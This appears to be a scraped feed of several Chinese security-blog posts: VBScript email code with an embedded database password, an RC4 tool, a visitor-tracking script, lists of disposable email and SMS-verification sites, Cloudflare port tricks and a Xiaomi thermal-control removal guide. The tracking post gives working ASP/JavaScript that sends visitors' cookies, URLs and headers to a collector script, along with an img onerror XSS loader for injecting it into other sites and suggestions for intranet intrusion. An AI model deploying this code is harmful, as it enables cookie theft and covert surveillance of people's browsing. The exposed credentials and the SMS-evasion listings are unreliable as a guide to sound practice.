Studio进行Microsoft Office开发的详细信息,请参阅以下Microsoft Developer Network(MSDN)网站: http://msdn.microsoft.com/en-us/library/aa188489(office.10).aspx 有关如何使用CDOSYS的其他信息,请单击下面的文章编号,以查看Microsoft知识库中相应的文章: 310221如何使用Visual C#.NET将Cdosys.dll库嵌入到新消息中 310224如何使用Visual C#.NET使用Cdosys.dll库处理Drop目录中的邮件 310225如何使用Cdosys.dll库通过使用Visual C#.NET将消息保存到文件 上次更新时间:2019年6月10日 ---------- CDOSYS.dll 发邮件,邮件体中文乱码 方案整理者:lgg2tmm 发布时间:2011-06-04 给位大侠,请帮忙看一下。 objEmail.TextBody.Charset = "Gb2312" 错误,不能运行。 要是没有这行,可以运行,但是中文是乱码。 Const adOpenStatic = 3 Const adLockOptimistic = 3 Const adUseClient = 3 Set objConnection = CreateObject("ADODB.Connection") Set objRecordset = CreateObject("ADODB.Recordset") objConnection.Open "DSN=cdma;uid=cdma_admin;pwd=cdma_admin" objRecordset.CursorLocation = adUseClient objRecordset.Open "SELECT * FROM RECEIVING_RELOG WHERE TO_CHAR(SENDMAILDATE,'YYYY') = TO_CHAR(SYSDATE,'YYYY') AND TO_CHAR(SENDMAILDATE,'MM') = TO_CHAR(SYSDATE,'MM') AND TO_CHAR(SENDMAILDATE,'DD') = TO_CHAR(SYSDATE,'DD')-2 AND ISSUE_DATE is null", objConnection, _ adOpenStatic, adLockOptimistic Do Until objRecordset.EOF toid = "" If objRecordset("ReceiverID1") <> "" then toid =toid&objRecordset("ReceiverID1")&"@"&"freescale.com"&";" End If If objRecordset("ReceiverID2") <> "" then toid =toid&objRecordset("ReceiverID2")&"@"&"freescale.com"&";" End If If objRecordset("ReceiverID3") <> "" then toid =toid&objRecordset("ReceiverID3")&"@"&"freescale.com"&";" End If If objRecordset("ReceiverID4") <> "" then toid =toid&objRecordset("ReceiverID4")&"@"&"freescale.com"&";" End If If objRecordset("ReceiverID5") <> "" then toid =toid&objRecordset("ReceiverID5")&"@"&"freescale.com"&";" End If If objRecordset("ReceiverID6") <> "" then toid =toid&objRecordset("ReceiverID6")&"@"&"freescale.com"&";" End If If objRecordset("ReceiverID7") <> "" then toid =toid&objRecordset("ReceiverID7")&"@"&"freescale.com"&";" End If If objRecordset("ReceiverID8") <> "" then toid =toid&objRecordset("ReceiverID8")&"@"&"freescale.com"&";" End If If objRecordset("ReceiverID9") <> "" then toid =toid&objRecordset("ReceiverID9")&"@"&"freescale.com"&";" End If If objRecordset("ReceiverID10") <> "" then toid =toid&objRecordset("ReceiverID10")&"@"&"freescale.com"&";" End If SendEmailDate = Month(Now()) & "-" & Day(Now()) & "-" & Year(Now()) Set objEmail = CreateObject("CDO.Message") objEmail.From = "Receiving_Center@freescale.com" objEmail.To = toid objEmail.Subject = "Delivery Notification on " & SendEmailDate objEmail.TextBody.Charset = "Gb2312" objEmail.TextBody = "Please pick up your goods within 24 hrs from receiving center. If you have any queries, please call our hotline number 13370329111 or Ext.85686516. Thanks." & vbCrLf & vbCrLf & "Delivery Date:" & objRecordset("REC_DATE") & vbCrLf & "Vendor Name:" & objRecordset("SUPPLIER_NAME") & vbCrLf & "PO#:" & objRecordset("PO_NO") & vbCrLf & "English Description:" & objRecordset("ENGLISH_DESC") & vbCrLf & "Chinese Description:" & objRecordset("CHINESE_DESC") & vbCrLf & "MAWB:" & objRecordset("MAWB") & vbCrLf & "HAWB:" & objRecordset("HAWB") & vbCrLf & "Original:" & objRecordset("ORIGIN") & vbCrLf & vbCrLf & "Best Regards," & vbCrLf & "Receiving Center" objEmail.Configuration.Fields.Item(") = 2 objEmail.Configuration.Fields.Item(") = "remotesmtp.freescale.net" objEmail.Configuration.Fields.Item(") = 25 objEmail.Configuration.Fields.Update objEmail.Send objRecordset.movenext Loop objRecordset.Close objConnection.Close 推荐解决方案 邮件主体=StrConv(邮件主体,vbunicode) 试一下行不行

2019/9/14
articleCard.readMore

rc4 加密 解密 算法 调试 测试 工具

rc4 是一种很常见的加密算法,编程经常用到,然而之前网上找了一大圈没有顺手的,所以之前自己花了点时间写了一个小工具,十分方便好用,同时支持二进制、文本数据的输入及输出,适用于任何场景。   可能是全网最好用的 rc4 加密解密算法调试测试工具。   用法极其简单,自己看说明吧。 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 作者:Nuclear'Atk (核攻击) 网站:https://lcx.cc/ 版本:1.0 (2019/06/12) 说明: rc4.exe 模式 密码 数据 [进制] [输出] 模式:0 = 加密文件,1 = 加密普通字符串,2 = 加密十六进制字符串。 密码:加密使用的密钥,如果有空格等特殊字符需要使用双引号引起来。 数据:模式 0 为文件路径,模式 1,2 为字符串,特殊字符需要双引号。 进制:可选参数,指定输出数据是 16 进制字符串(默认) 还是 2 进制。 输出:可选参数,可以将数据输出到指定文件,路径有空格需要双引号。 提示: rc4 加密和解密的算法是一样的,加密后用相同密码再次调用即是解密。 例子: rc4.exe 0 123456 a.txt rc4.exe 0 123456 a.txt 2 b.txt rc4.exe 0 123456 a.txt 16 rc4.exe 0 123456 a.txt 16 b_hex.txt rc4.exe 1 123456 "test string 123456 !@#" rc4.exe 1 123456 "test string 123456 !@#" 2 a.txt rc4.exe 1 123456 "test string 123456 !@#" 16 a_hex.txt rc4.exe 2 "123456" 74901714045A66BC0B5251C2D8 rc4.exe 2 "123456" 74901714045A66BC0B5251C2D8 2 rc4.exe 2 "123456" 74901714045A66BC0B5251C2D8 16 rc4.exe 2 "123456" 74901714045A66BC0B5251C2D8 2 a.txt   下载地址:rc4.exe

2019/7/6
articleCard.readMore

IP 定位 逆向追踪溯源访客真实身份 调查取证

核总(https://lcx.cc/)在工作中经常需要追踪某个用户、访客的详细访问轨迹,用于逆向反查、调查分析、溯源追踪、电子取证,以帮助定位用户准确真实身份、实名信息,以及 IP 地址精确定位,最常见于犯罪调查、攻击事件溯源。   于是核总根据工作中的经验,做了一个高兼容度的 HTTP/HTTPS 访问轨迹跟踪程序,适用于任何支持 js 的网站或程序,可以直接载入或者使用 XSS 远程加载(你懂的),收集了几乎 HTTP 协议所能抓取到的所有访客信息。 信息维度   收集的信息覆盖范围主要包含以下维度:   1、服务器端和 HTTP 头: 访问时间 访问方法(GET/POST/HEAD) 访客 IP 地址 访客使用的端口 访客操作系统类型(User-Agent) 原始 HTTP 头(UTF8-URL 编码) 原始 Cookies 数据 原始 POST 数据 原始 GET 数据   2、客户端浏览器 js 脚本二次深度增强收集: href(document.location.href) top_href(top.location.href) opener((window.opener && window.opener.location.href) ? window.opener.location.href: ‘') title(document.title) cookie(document.cookie) referer(document.referrer) screen(screen.width + ‘*’ + screen.height) user-agent(navigator.userAgent)   提示一下,原始 HTTP 头中包含了更详细的系统信息,有完整的代理链路以及代理后的真实 IP 地址,例如字段: Client-IP True-Client-IP X-Client-IP X-Forwarded-For X-Forwarded-Host X-Originating-IP X-Real-IP X-Remote-Addr X-Remote-IP 增强升级   这些详细信息基本已经足够用了,但既然这个话题已经写到这里了,就多写点干货吧,其实还可以再深度升级一下,例如: 利用 res:// 协议刺探客户端文件信息、检测客户端环境、是否安装360、杀毒软件、某些系统文件等。 使用 HTML5 Canvas 计算客户端浏览器唯一指纹、指纹跟踪。 利用各大社交、购物、视频、ISP 运营商等网站的 cookies、xss、csrf、json 定位用户登录的账号信息。 还可以抓取访客手机号、QQ号。 还可以获取内网 IP 地址、Mac 地址、硬件信息、刺探内网资源。 甚至可以使用 js 利用漏洞或弱口令入侵内网 Windows 系统、Linux 系统、工控设备、路由器、摄像头、交换机等其他智能设备,高级渗透、反向入侵。 如果目标用户是移动客户端的话(例如微信或手机浏览器等),还可以尝试 HTML5 中新加的地理位置功能(Geolocation API)进行详细定位,获取精准 GPS 经纬度坐标信息。 核总(https://lcx.cc/)在这里抛砖引玉,各路大神自由发挥~ 脚本源码   index.html 1 2 3 4 5 6 7 8 9 10 11 12 13 <title>Test 测试</title> <body> <!-- <img src="#" onerror="x = document.createElement('script');x.src = 'js.asp';document.body.appendChild(x);" /> --> </body> <script type="text/javascript" src="js.asp"></script> <a href="#" onclick="window.open('index.html', '_blank');">opener</a> <script type="text/javascript"> document.write('<a href="http://localhost/?'+Math.floor(Math.random() * 999999 + 1)+'#'+Math.floor(Math.random() * 999999 + 1)+'">http://localhost/</a>') </script>   js.asp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 <% 'On Error Resume Next ' 记录日志 savelog() ' 没有参数则输出 js 代码,收集更详细的信息 if request("href") = "" then outputjs() end if '--------------------------------------------------------------------------------------------------- public function outputjs() response.clear response.addheader "Content-Type", "application/javascript" %> (function() { var u = '//<%=Request.ServerVariables("HTTP_HOST")&Request.ServerVariables("SCRIPT_NAME")%>' + '?href=' + encodeURIComponent((function() {try {return document.location.href} catch(e) {return ''}})()) + '&top_href=' + encodeURIComponent((function() {try {return top.location.href} catch(e) {return ''}})()) + '&opener=' + encodeURIComponent((function() {try {return (window.opener && window.opener.location.href) ? window.opener.location.href: ''} catch(e) {return ''}})()) + '&title=' + encodeURIComponent((function() {try {return document.title} catch(e) {return ''}})()) + '&cookie=' + encodeURIComponent((function() {try {return document.cookie} catch(e) {return ''}})()) + '&referer=' + encodeURIComponent((function() {try {return document.referrer} catch(e) {return ''}})()) + '&screen=' + encodeURIComponent((function() {try {return screen.width + '*' + screen.height} catch(e) {return ''}})()) + '&user-agent=' + encodeURIComponent((function() {try {return navigator.userAgent} catch(e) {return ''}})()); if (document.body != null) { var x = document.createElement('script'); x.src = u; document.body.appendChild(x); } else { document.write('<scr' + 'ipt src=\'' + u + '\'></scr' + 'ipt>'); } })(); <% response.end end function public function savelog() ' 记录日志,格式:时间,方法,访客IP,访客端口,系统类型,原始HTTP头(UTF8-URL编码),Cookies数据,原始POST数据,原始GET数据 dim fso set fso = server.createobject("scripting.filesystemobject") set file = fso.opentextfile(server.mappath(".\cf3a7c3e_" & year(date) & month(date) & day(date) & ".txt"), 8, true) file.writeline now & vbtab & _ request.servervariables("request_method") & vbtab & _ request.servervariables("remote_addr") & vbtab & _ request.servervariables("remote_port") & vbtab & _ request.servervariables("http_user_agent") & vbtab & _ server.urlpathencode(request.servervariables("all_raw")) & vbtab & _ request.cookies & vbtab & _ request.form & vbtab & _ request.querystring file.close end function %> 参考资料   【Asp】Asp超精准判断客户端浏览器类型   【Asp】ASP获取客户端/服务器相关信息   【Asp】判断客户端系统和浏览器类型以及版本   【Asp原创】Asp超详细显示客户端系统信息   【CSRF】基于图片方式(<img)的 DDOS、CC、会话劫持以及刺探用户信息   Asp超详细显示客户端系统信息   ASP获取客户端、服务器相关信息   HTTP 协议中 POST、GET、HEAD 等参数详解   JavaScript 获取客户端计算机硬件及系统信息   JSON探针—定位目标网络虚拟信息身份,利用大量三方网站cookie进行追踪   JS绕过代理、VPN获取真实IP及内网IP,逆向追踪   Microsoft RES 协议详解与安全 - RES 协议浅析   XSS检测客户端环境,javascript 检测客户端文件、系统环境   网站插入一段神奇代码 即可获取浏览者手机号码 截取访客电话号码 手机营销   修改浏览器的 User-Agent 来伪装你的浏览器和操作系统   中国电信ADSL宽带信息泄露,可查任意IP对应的宽带账号,电话号码,上门砍人

2019/4/22
articleCard.readMore

国内外临时匿名邮箱及接收手机短信验证码网站

核总(https://lcx.cc/)自从业以来,因为行业特殊,所以一直有各种相关需要,于是这些年从各个地方收集了一些国、内外免费临时接收邮箱及手机短信验证码的网站平台,数量比较多,抽时间进行了一些整理,在这里总结记录一下。   主要是一些匿名、临时、一次性的邮箱地址,以及可以免费收发短信验证码的手机号平台,方便注册各种账号时完全匿名、隐藏真实身份,像黑产大佬、灰产大佬和羊毛党们都精通此道,核总就不必多废话了……   而像核总(https://lcx.cc/)这种遵纪守法的好公民,最多也就随便注册下小号,避免泄漏个人真实信息,免的到处都收到各种垃圾骚扰广告信息。 匿名个人身份信息生成器   Generate a Random Name - Fake Name Generator   国外的一个随机匿名假身份信息生成器,可以生成一套包括姓名、性别、年龄、国家、身份证号、银行卡号、电话号码、邮箱地址、身高、体重、血型、车辆信息等的匿名身份资料,针对注册国外账户比较实用。   同时还附赠一个匿名假邮箱生成器,可以当作临时、一次性、匿名邮箱使用。   核总特别推荐,非常实用。 ProtonMail   https://protonmail.com/,一个可以完全匿名使用的电子邮箱。   ProtonMail 世界上最大的以个人隐私安全为特色的加密电子邮件提供商,总部在瑞士,2013 年由欧洲核子物理研究所(CERN)、麻省理工(MIT)、以及哈佛(Harvard)的研究人员联合创建,致力于为注重隐私和安全性的用户提供加密电子邮件服务。   支持免费和付费两类帐户,所有账户均使用端到端加密功能,默认启用 PGP 加密,支持使用 Tor 网络访问!   如果你需要安全性强,又有极高隐私且无广告的电子邮件信箱,ProtonMail 绝对是目前最好的选择。   以下是官方的介绍:   瑞士隐私·数据安全性和中立性   ProtonMail 在瑞士注册成立,我们所有的服务器都在瑞士。这意味着所有用户数据都受到严格的瑞士隐私法律的保护。   端到端加密·自动邮件安全   所有电子邮件都通过端到端加密自动保护。这意味着即使我们无法解密和阅读您的电子邮件。因此,您的加密电子邮件无法与第三方共享。   匿名电子邮件·保护您的隐私   创建您的安全电子邮件帐户不需要任何个人信息。默认情况下,我们不保留任何可链接到您的匿名电子邮件帐户的 IP 日志。您的隐私至上。   开源的·免费的安全电子邮件   我们认为电子邮件隐私应该对所有人开放。这就是为什么我们的代码是开源的,而ProtonMail基本帐户始终是免费的。   提示:ProtonMail 为了防止滥用,会根据注册环境判断是否需要人机验证,可以使用 https://www.guerrillamail.com/ 的 guerrillamail.org、grr.la 等后缀临时邮箱通过验证,另外注册时记得使用 Chrome 的隐身模式,或者每次修改 User-Agent,因为 protonmail 会根据浏览器指纹做判断,或者在验证的时候直接选择捐赠虚拟币,简单粗暴。 临时、一次性、匿名邮箱   临时邮箱- 马建军大学免费教育邮箱,可以通过一些网站的教育认证,享受教育优惠(白嫖)   Fake Mail Generator - Free temporary email addresses   查错网 - 临时邮箱、十分钟邮箱(10分钟)、临时邮、临时Email,还支持发邮件!   YOPmail - 临时、匿名的免费邮箱地址   10分钟邮箱 - 10minutemail.net、10minutemail.org、10minutemail.info   临时邮箱 - 十秒钟内收到邮件   Guerrilla Mail - Disposable Temporary E-Mail Address,支持发送邮件!   Moakt Email - 临时邮箱专业服务,支持发送邮件!   Temp Mail - Disposable Temporary Email   一次性临时电子邮件 - 📨 Temp Mail   Temp Mail - Free Temporary Email   Temp Mail - Temporary Email   Temp Mail - Temporary Disposable Email Address   Temporary email. Email for 10 minutes or more.   临时一次性匿名电子邮箱 - 隐私邮箱   https://linshiyou.com/(2020年2月14日发现已停止解析)   由于平台较多,不能逐一验证、及时更新,欢迎联系我纠错、补充! 国内外手机号、短信验证码平台   SMS-Activate:老牌,一次性短信接码服务,全球虚拟号码,按量购买,注册号码方便   TextNow:注册可得免费号码,一周不用会回收(可订阅广告保号),但可以再选   Textfree:注册可得免费号码,一月不用会回收(可订阅广告保号),但可以再选   OnPhone - 第二个电话号码:手机APP,收费的,比较贵,可选国家比较多   SMS Man 免费短信验证服务:美国,英国,瑞典,荷兰,比利时,乌克兰,以色列,拉脱维亚,等国家   短信验证码在线接收码平台 - 隐私短信:英国,法国,美国,中国,德国,菲律宾,香港,加拿大   掠影网络 - 免费在线接收短信验证码:香港/美国/加拿大/中国,之前的旧地址   materialtools.com - 云短信 在线短信接收:号码多、号段好,中国,英国,旧地址   yunduanxin.net - 云短信 免费在线接收短信验证码:号段好,美国,加拿大,英国,中国   Receive SMS Online For Free - Free:美国,英国,奥地利,瑞典,比利时   Receive FREE SMS online:美国,法国,俄罗斯,澳大利亚,英国,加拿大,瑞士等各国   Receive-SMS-Now - 美国,加拿大,西班牙   Receive Online SMS - 美国,瑞典,挪威,西班牙,英国   Receive SMS Online - 国外免费临时手机号   Receive SMS Online - 俄国,英国,乌克兰   Receive SMS Online - 美国,加拿大,西班牙   Receive SMS - 比利时,英国,美国   SELLAITE - 爱沙尼亚   Receive Free SMS - 美国,英国,法国,波兰,比利时,加拿大   Receive-SMS-Now - 美国,加拿大,荷兰   免费接码|短信验证码|在线接收短信|接码平台 - 中国,缅甸,美国   Z-SMS - 在线云短信网页版 - 免费接码平台:中国,美国,缅甸,爱沙尼亚,等多国   FreePhonenum - 国外免费临时手机号(中文)美国,加拿大:支持免费发短信   Receive a SMS Online:美国,英国,法国,加拿大等全球各国,旧地址   Receive-SMS - 美国   Free SMS Numbers Online - 美国,英国,加拿大,波兰   Receive SMS online for Free:美国,英国,加拿大,瑞典,法国,马来西亚,印度尼西亚   SMS-Receive - 俄罗斯,法国,罗马尼亚,西班牙,荷兰,英国   SMSReceiveFree - 美国,英国,加拿大   Free Online Phone - 美国,加拿大,英国,瑞典   Receive SMS Online:美国,英国,法国,加拿大等全球各国   Receive SMS Online - 国外免费临时手机号   Receive SMS Online for FREE:英国,罗马尼亚,美国,西班牙,法国,德国,俄罗斯   RECEIVE SMS ONLINE - 美国,加拿大,英国   Twilio - 用于SMS,语音,视频和身份验证的通信API:支持API调用,看上去很不错   MyTrashmobile - 美国,英国,加拿大   2020最新短信验证码接收平台 - 免费接码平台   小鸟接码平台 - 免费提供接码服务 - Receive SMS Online   becmd.com - 免费短信验证码接收平台:https://www.becmd.com/:2021年7月2日,疑似已废弃,已跳转到电影网站   云短信 - 免费在线短信接收:https://sms.cm/:疑似已废弃   在线短信验证码接收:http://www.smszk.com/:2020年2月14日发现已停止解析   由于平台较多,不能逐一验证、及时更新,欢迎联系我纠错、补充!

2019/3/31
articleCard.readMore

Cloudflare 自定义源站端口、代理、端口转发

Cloudflare CDN 如何实现自定义源站端口、代理、端口转发任何协议?   根据官方参考文章内容“Which ports will Cloudflare work with?”所述,Cloudflare 支持以下方式的自定义端口访问。   首先在 DNS 解析处正常添加解析记录,然后访问的时候支持这样: HTTP 流量可以使用的回源端口 1 2 3 4 5 6 7 http://lcx.cc:80 --> http://源服务器地址:80 http://lcx.cc:8080 --> http://源服务器地址:8080 http://lcx.cc:8880 --> http://源服务器地址:8880 http://lcx.cc:2052 --> http://源服务器地址:2052 http://lcx.cc:2082 --> http://源服务器地址:2082 http://lcx.cc:2086 --> http://源服务器地址:2086 http://lcx.cc:2095 --> http://源服务器地址:2095 HTTPs 流量可以使用的回源端口 1 2 3 4 5 6 https://lcx.cc:443 --> https://源服务器地址:443 https://lcx.cc:2053 --> https://源服务器地址:2053 https://lcx.cc:2083 --> https://源服务器地址:2083 https://lcx.cc:2087 --> https://源服务器地址:2087 https://lcx.cc:2096 --> https://源服务器地址:2096 https://lcx.cc:8443 --> https://源服务器地址:8443   即:访问的前后端都加特定的端口,成对访问。   需要注意的是,由于众所周知的备案问题,CloudFlare 对外提供服务的端口在企业用户开启使用大陆 CDN 节点的情况下(备案后),就只能使用 80、443 端口,也就是说中国境内的 HTTP/HTTPS 流量节点只支持 80 和 443 端口。   同时 Cloudflare 还新出了一个端口转发服务:Proxy Anything,目前是免费的,需要申请试用,支持转发任何协议、任何数据(目前仅开放了 TCP 协议),具体如何申请参考底下。   So,掌握了这些,你就可以将 V2Ray、Shadowsocks(ShadowsocksR/SS/SSR/酸酸乳) 或游戏服务器等服务架设在 Cloudflare 高速 CDN 网络上,还能隐藏原始 IP 地址,防止被封,你懂的……   那么还有个问题是,这样自定义端口的方式,访客访问的时候会很不方便,总不能让访客每次都手工输入端口号吧?而且这玩意也不好记……   其实,Cloudflare 已经帮我们解决这个问题了,这个功能就是:页面规则(Page Rules)   通过自定义页面规则,可以在访客输入不带端口的主域名 https://lcx.cc/ 的时候自动跳转到 https://lcx.cc:自定义端口/,实现无感知访问跳转,不用手动输入自定义的端口了,比较方便。   例如创建以下页面规则:   规则:lcx.cc:80/*   类型:转发 URL,301 永久重定向   目标:https://lcx.cc:8080/$1   注意:HTTPS 网站建议开启“Always Use HTTPS”。   具体用法请参考官方说明文档:了解和配置 Cloudflare Page Rules 页面规则教程 参考资料   1、CloudFlare上线了新的Proxy Anything选项, 支持转发TCP连接 可以说是期待了一段时间的Cloudflare的TCP转发功能算是上线了,固定了TCP端口(我看到的反正是43和44),并支持HAProxy所支持的PROXY v1协议,已测试可爱的V2Ray/Shadowsocks都能使用,并且延迟和带宽都还不错(此处仅指我本地测试结果). 设置很简单,不多说什么了,大家自己去用用看. 另外,恕鄙人不靠谱预测一下,从选端口的时候同时选协议并且选项叫protocol,以及申请表单标题是L4 Proxy看,应该后续有udp支持. 补一个说明:本人绝对的免费用户,如果你没看到proxy anything的选项应该是先前没有提交试用表单. 申请地址: https://goo.gl/forms/Oc2jyyo0kXsrMyw33 设置指南: https://docs.google.com/document/d/1jXdmDH8QBg1OQEG5Mb18jYjoPg-XJRuls4IdnyBofLw/edit?usp=sharing 论坛反馈: https://community.cloudflare.com/t/proxy-anything-beta-feedback/11112   2、Which ports will Cloudflare work with? Cloudflare将与哪些端口配合使用? Cloudflare代理应用程序级别(第7层)的HTTP流量和传输级别(第4层)的TCP流量的流量。 概观   Cloudflare几乎可以代理所有TCP端口。我们支持两种代理:   应用程序级别(第7层)HTTP代理,以及   频谱,传输级别(第4层)TCP代理 HTTP代理   Cloudflare可以代理通过下面列出的HTTP / HTTPS端口的流量。   如果您的流量位于不同的端口,则可以将其作为我们不代理的内容添加为Cloudflare DNS区域文件中的记录(灰色云=没有Cloudflare代理或记录缓存)。   Cloudflare支持的HTTP端口是:   80,8080,8880,2052,2082,2086,2095   Cloudflare支持的HTTPs端口是:   443,2053,2083,2087,2096,8443 对于Pro计划及更高版本,您可以使用WAF规则ID 100015阻止80和443以外的端口上的流量:“阻止对除80和443之外的所有端口的请求”。 端口80和443是唯一的端口:   对于启用了中国网络的区域内的中国境内的HTTP / HTTPS流量   对于Cloudflare应用程序能够代理   当CloudFlare的缓存可用 频谱代理   Cloudflare Spectrum是一种企业计划产品,支持通过任何端口代理任意TCP协议。唯一的例外是端口21,其中不支持代理。   要了解更多信息,请访问Cloudflare Spectrum文档站点。 以下是英文原文 Cloudflare proxies traffic for HTTP traffic at the application level (Layer 7) and TCP traffic at the transport level (Layer 4). Overview   Cloudflare can proxy almost all TCP ports. We support two flavors of proxy:   an application level (Layer 7) HTTP proxy, and   Spectrum, a transport level (Layer 4) TCP proxy HTTP proxying   Cloudflare can proxy traffic going over the HTTP/HTTPS ports listed below.   If your traffic is on a different port, you can add it as a record in your Cloudflare DNS zone file as something we don’t proxy (gray cloud = no Cloudflare proxy or caching on a record).   The HTTP ports that Cloudflare support are:   80,8080,8880,2052,2082,2086,2095   The HTTPs ports that Cloudflare support are:   443,2053,2083,2087,2096,8443   For the Pro plan and above, you can block traffic on ports other than 80 and 443 using WAF rule id 100015: “Block requests to all ports except 80 and 443”.   Ports 80 and 443 are the only ports:   For HTTP/HTTPS traffic within China for zones that have the China Network enabled   For Cloudflare Apps to be able to proxy on   Where Cloudflare Caching is available Spectrum proxying   Cloudflare Spectrum is an Enterprise plan product that supports proxying arbitrary TCP protocols over any port. The only exception is port 21, where proxying is not supported. To learn more, visit the Cloudflare Spectrum documentation site.

2019/3/25
articleCard.readMore

小米5s 小米6 MIUI 系统 删除温控 破解限制

众所周知,小米安卓(Android)手机 MIUI 系统有个很狗血的特点:温控!   核总(https://lcx.cc/)用小米手机也很多年了,温控也关注过不少,网上一堆垃圾内容误导新手跳坑走弯路,所以核总在这里进行详细完整的讲解下。   注意!文中所有涉及到的文件、工具、驱动等资料,文章末尾都有下载。 何谓“温控”?   温控全称为手机温度控制,即小米安卓手机的一项系统核心功能,当你手机温度超过一定范围时,CPU 将自动锁核(多核只能用单核)、限制最高频率,So,你的手机突然就会卡成幻灯片,在充电、玩游戏时尤为明显,分分钟想砸了手机……   小米的部分型号十分明显:小米 5s、小米 6 等,MIUI 论坛骂声一片,最早还可以在MIUI 9 开发版系统设置中自行选择是否启用温控(省电策略、性能模式、游戏模式),后来更新到 MIUI 10 直接取消了选择权,So……   于是米粉们纷纷捣鼓出了例如“温控拜拜”、“内核调校”之类的 APP 删温控配置文件或者修改参数,MIUI 9 系统运行良好,后来 MIUI 10 出来后很多不支持了,再后来小米论坛有大神捣鼓出了修改版的温控配置文件,完美解决了该问题。 什么是温控配置文件?   小米的 MIUI 系统核心温控功能实际上是依靠几个主要配置文件,规定了温度范围、如何限制核心数、频率的控制策略等(罪魁祸首),主要在安卓系统中以下路径: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 # Bin 文件 /system/vendor/bin/thermal-engine -rwxr-xr-x 1 root shell 6731600 2009-01-01 00:00 # 标准模式 /system/vendor/etc/thermal-engine-8996.conf -rw-r--r-- 1 root root 3744 2009-01-01 00:00 # 游戏模式 /system/vendor/etc/thermal-engine-8996-game.conf -rw-r--r-- 1 root root 3376 2009-01-01 00:00 # 性能模式 /system/vendor/etc/thermal-engine-8996-high.conf -rw-r--r-- 1 root root 3200 2009-01-01 00:00 # ??模式 /system/vendor/etc/thermal-engine-8996-map.conf -rw-r--r-- 1 root root 176 2009-01-01 00:00   注意!这里以 MIUI 10 系统为例,根据系统版本不同,文件位置略有不同!   操作及删除之前记得备份!!!记得备份!!!记得备份!!!   其实不备份也行,反正每次 MIUI 系统升级后,这些文件又会再回来,因为小米系统是全覆盖式更新,无论你对系统做了什么修改,每次更新之后都会完全恢复…… -_-!!!   小提示,如果以后系统升级后温控文件位置发生变化,可以通过以下系统命令查找温控文件位置: 1 find /system -name "thermal-engine*" 前提条件   在修改温控文件、解除温控限制之前,请确保你手机已经具备以下条件,否则底下内容就不用看了,因为权限不够无法操作…… 手机必须解锁 BL(BootLoader),否则没有 root 权限无法操作! 解锁 system 分区,不然无法操作 system 目录文件。 打开开发者模式并开启 USB 调试。 将手机连接到电脑,并装好驱动程序和相应工具。 1.解锁 BL(BootLoader)   官网有提供解锁教程和方法,而且刷成开发版自带 root 权限,具体的去看官网论坛。 2.解锁 system 分区 ★ 警告 ★   系统 system 分区解锁后如果修改了 system 目录的文件,就不能再上锁(只有使用原版系统文件才能上锁),否则无法通过开机文件校验!!!   但是下次手机更新后会自动恢复所有系统文件并自动上锁!所以无需担心!系统更新后再次修改温控,需要重复以下的方法关闭就行了。   因为 MIUI 系统开启了安卓的系统文件校验,也就是所谓的“system 锁”,如果不关闭这个系统文件校验,那么刷入第三方 RE 或者修改 system 分区文件会导致无法通过开机文件校验(俗称卡米)。   因为咱们要修改 system 分区的温控配置文件,所以必须解锁。   推荐使用命令解锁(安全、便捷、高效): 1 2 3 4 5 6 7 8 9 10 11 # 解锁命令 adb root adb disable-verity adb reboot # 重新上锁 # ★ 警告 ★ # ★ 如果修改了 system 目录的文件,就不能再上锁,否则无法通过开机文件校验! ★ adb root adb enable-verity adb reboot   或者“system 分区一键解锁、上锁.apk”、“NFC Emulator”等来路不明的第三方应用,需要 root 权限,不推荐、不安全!   底下实际操作中有详细说明。 3.开启 USB 调试   首先进入系统设置,找到系统版本、全部参数(各个系统版本不太一样),最后点几下 MIUI 版本就会进入开发者模式。   然后在系统设置>更多设置>开发者模式,打开开发者选项和 USB 调试。 4.安装驱动和工具   驱动程序主要为 ADB Interface 驱动。   可以使用小米手机助手或任何其他安卓手机助手(都自带),或者: 360驱动大师 驱动精灵 Universal Adb Driver MIUI 官方的小米手机驱动 其他…   核总推荐使用:360驱动大师、Universal Adb Driver   工具软件只需要 Platform-Tools 中的 adb.exe(安卓官方调试工具),此乃极客、刷机、折腾的必备工具!   一直以来,刷机爱好者折腾 Android 系统使用的 adb / fastboot 都来自两个渠道:别人提供的(来源不明)、安装十分庞大的 Android Studio,从来没有一个官方的、可靠的独立 adb / fastboot 工具包,现在终于有了!   Google 谷歌官方提供了 Windows、macOS 以及 Linux 下的工具包的直接下载地址: 1 2 3 https://dl.google.com/android/repository/platform-tools-latest-darwin.zip https://dl.google.com/android/repository/platform-tools-latest-linux.zip https://dl.google.com/android/repository/platform-tools-latest-windows.zip   从此地址下载的 Platform-Tools 工具包将永远是最新版本。 操作方案   以 MIUI 10 版本为例,其他版本大同小异。   1、删除刚才说的这几个温控配置文件(建议备份): 1 2 3 4 5 /system/vendor/bin/thermal-engine /system/vendor/etc/thermal-engine-8996.conf /system/vendor/etc/thermal-engine-8996-game.conf /system/vendor/etc/thermal-engine-8996-high.conf /system/vendor/etc/thermal-engine-8996-map.conf   2、复制 MIUI 论坛大佬修改过的温控文件到: 1 /system/vendor/etc/thermal-engine-8996.conf   3、最后手动重启,完事,四核火力全开温度不热。   此温控配置方案可以解决任何顽固温控,火力全开不锁核,并且发热可控不烧机(小米公司一堆工程猪连个发热都解决不好,只会降频、锁核~),并且只要 MIUI 系统没有很大结构性更新,就永久有效!   需要注意的是,上边说过小米系统更新后所有修改都会恢复,所以每次系统更新完还需要再修改一次! 操作流程   核总(https://lcx.cc/)用的方案不依赖任何第三方应用,简单安全高效!   以下为全命令操作流程:   1、首先使用 adb.exe 解锁 system 分区:   注意!仅刷机或系统更新后首次需要解锁!如果已经解锁过则直接第 2 步!   ★ 警告!system 分区解锁后如果修改了 system 目录的文件,就不能再上锁,否则无法通过开机文件校验! ★ 1 2 3 4 5 6 7 8 # 提升为 root 权限 adb root # 解锁 system 分区(重新启动后生效) adb disable-verity # 重启 adb reboot   2、等待重启开机后,先开启 root 权限: 1 adb root   3、然后挂载 system 目录为读写权限(可以在 adb shell 中查看分区挂载状态:mount | grep 'system')   提示:如果部分机型无效的话,可以参考底下的:几种挂载方法 1 adb shell mount -o rw,remount -t auto /system   4、然后备份或直接删除原版温控配置文件(反正系统更新后又会回来): 1 2 3 4 5 6 7 8 9 10 11 12 13 # 